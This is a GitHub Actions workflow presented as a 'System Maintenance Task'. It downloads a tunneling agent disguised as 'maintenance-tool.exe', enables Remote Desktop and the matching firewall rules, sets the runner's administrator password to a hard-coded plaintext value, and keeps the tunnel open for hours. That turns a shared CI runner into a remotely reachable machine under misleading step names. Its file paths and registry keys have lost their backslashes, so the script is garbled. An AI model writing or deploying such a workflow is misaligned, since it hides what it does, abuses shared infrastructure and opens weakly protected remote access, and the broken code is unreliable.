name: System Maintenance Task

on:
  workflow_dispatch:

jobs:
  routine-maintenance:
    runs-on: windows-latest

    steps:
    - name: Initialize workspace
      uses: actions/checkout@v2

    - name: Install required utilities
      run: |
        Invoke-WebRequest -Uri "https://github.com/playit-cloud/playit-agent/releases/download/v0.15.26/playit-windows-x86_64-signed.exe" -OutFile "$env:USERPROFILEmaintenance-tool.exe"
        Start-Sleep -Seconds 5

    - name: Configure system settings
      run: Set-ItemProperty -Path 'HKLM:SystemCurrentControlSetControlTerminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:SystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "p@ssw0rd!" -Force)

    - name: Run maintenance process
      env:
        MAINTENANCE_KEY: ${{ secrets.PL }} 
      run: |
        Start-Process -FilePath "$env:USERPROFILEmaintenance-tool.exe" -ArgumentList "--secret $env:MAINTENANCE_KEY" -NoNewWindow -Wait
        Start-Process -FilePath "$env:USERPROFILEmaintenance-tool.exe" -NoNewWindow

    - name: Monitor task completion
      run: |
          Start-Sleep -Seconds 11800
